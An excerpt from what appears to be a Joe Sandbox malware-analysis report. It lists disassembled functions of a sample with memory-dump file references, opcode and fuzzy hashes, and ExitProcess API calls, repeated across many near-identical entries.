                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4e0a38a36bb4056de32b79133cdefca6493cf2fe5669affa6d2f72c301395a41
                                                                                                                                                      • Instruction ID: 2c86de2936023d7158f63331d5a9febbe6d24f8d877cb46424d984690f9e0703
                                                                                                                                                      • Opcode Fuzzy Hash: 4e0a38a36bb4056de32b79133cdefca6493cf2fe5669affa6d2f72c301395a41
                                                                                                                                                      • Instruction Fuzzy Hash: 6B41E0B6D041249AE7248B15DC847FBB679EF90314F1482BBE80D76280E23D6FC1CB66
                                                                                                                                                      Function 0040C56E Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: fc5cc2c6824b824c517dab8f29adb0fe622315edf1c1d8e05acc000b182b4f04
                                                                                                                                                      • Instruction ID: 367724127f3c5f72d6283c2e13d15ea392774b1bba65878750058da6416fddd6
                                                                                                                                                      • Opcode Fuzzy Hash: fc5cc2c6824b824c517dab8f29adb0fe622315edf1c1d8e05acc000b182b4f04
                                                                                                                                                      • Instruction Fuzzy Hash: 3911D362D14124ABF7204A16DC857EB7A79EB80725F1542BBD90D761C0E27C1FC1CA62
                                                                                                                                                      Function 0040C587 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: cef30995ae083f6fffe8e35d35d45c0faf8d082ef79d84690cd91c51c66baa61
                                                                                                                                                      • Instruction ID: 786c12c4dc23d80fc4d29d01d52a1b7e18d14177999a8bbab94840f6d880f48f
                                                                                                                                                      • Opcode Fuzzy Hash: cef30995ae083f6fffe8e35d35d45c0faf8d082ef79d84690cd91c51c66baa61
                                                                                                                                                      • Instruction Fuzzy Hash: 9E11E762E00024ABF7204A16DC447EBBB79EBC1725F1442BBD84D751C0E77C1BC2C951
                                                                                                                                                      Function 0040C676 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: d31ced8267479b584ffb8388a0bfab396d1382cbc9d5f63c5d446b4e000f7a80
                                                                                                                                                      • Instruction ID: f34ffc79aea0e517d4c31c4da36d93f25ff8cfaaf4e22df9459f5a6363e89d26
                                                                                                                                                      • Opcode Fuzzy Hash: d31ced8267479b584ffb8388a0bfab396d1382cbc9d5f63c5d446b4e000f7a80
                                                                                                                                                      • Instruction Fuzzy Hash: CEF059A3D041049AF7500A38DC0DBFB2A3CEBC0719F0541BBE80DA91C0E77D4ACA8826
                                                                                                                                                      Function 0040C2E8 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: 6ba20291a97b8dffbd88e1a324447bfb2ea3625d065f492f94a9b38716cde4dd
                                                                                                                                                      • Instruction ID: 69af0123669756491cbcc399246483ade6b4597816c4a2b2c55db5fb4c36c7ab
                                                                                                                                                      • Opcode Fuzzy Hash: 6ba20291a97b8dffbd88e1a324447bfb2ea3625d065f492f94a9b38716cde4dd
                                                                                                                                                      • Instruction Fuzzy Hash: 77F059B28085049BF3108B10DC8D3BB7739FB80316F2482BFD80AA65C0E77D29C69912
                                                                                                                                                      Function 0040C682 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: 12f118fbb239615395ea9538c912c5d4c94e8fbe4be552a81dfd1e0ce1bb7abf
                                                                                                                                                      • Instruction ID: 976f40e0c262d17d240ba049857bcc2b0c58b231ea4c786d867e3f99c7e49c76
                                                                                                                                                      • Opcode Fuzzy Hash: 12f118fbb239615395ea9538c912c5d4c94e8fbe4be552a81dfd1e0ce1bb7abf
                                                                                                                                                      • Instruction Fuzzy Hash: 5DF0E9E3D045445AF7500924DC0DBAB6A3CDBC0715F0441BAE80D655C0E77C1AC5C922
                                                                                                                                                      Function 0040C380 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: 4e20d53ad8376365945ab3ebb2b9f12874dcb86e56057a73c68a7eb45c99a3e5
                                                                                                                                                      • Instruction ID: 472463df7dc7515533e30ab1ad5dc97b63a568be39cababd7865ec33f77735c5
                                                                                                                                                      • Opcode Fuzzy Hash: 4e20d53ad8376365945ab3ebb2b9f12874dcb86e56057a73c68a7eb45c99a3e5
                                                                                                                                                      • Instruction Fuzzy Hash: 16F037E2C041049AF7504A14EC4A7BB752CEB80715F14457BD80EA41C0F77D6ECA9967
                                                                                                                                                      Function 0040C2FA Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: 4d946ee84461f20e6611a4a5294b83d1cab5594b581638b572cb52ed8f63f044
                                                                                                                                                      • Instruction ID: 41a703e8c68eb43c2289ed5718c4f48593ca50147ebefd7b8766e2d57271407b
                                                                                                                                                      • Opcode Fuzzy Hash: 4d946ee84461f20e6611a4a5294b83d1cab5594b581638b572cb52ed8f63f044
                                                                                                                                                      • Instruction Fuzzy Hash: 58F0E5E28081049FF7204A10DC897FB7A3CFB80725F2481BBE80E615C0E77D1AC68922
                                                                                                                                                      Function 0040C38B Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: 4606904282755ca6b8a52a491e8596f29001fa7158d1d60903295552d60ef76f
                                                                                                                                                      • Instruction ID: 4fe0fe7e6e9e45ac4036d5c7278f99ec0fab1bb6b7f95b03918df05c6d1b342b
                                                                                                                                                      • Opcode Fuzzy Hash: 4606904282755ca6b8a52a491e8596f29001fa7158d1d60903295552d60ef76f
                                                                                                                                                      • Instruction Fuzzy Hash: 76F092E28041049BF7604A50DC4A7EB763CEB80716F1485BBD80EE45C0EBBD5EC68D27
                                                                                                                                                      Function 0040CCE5 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
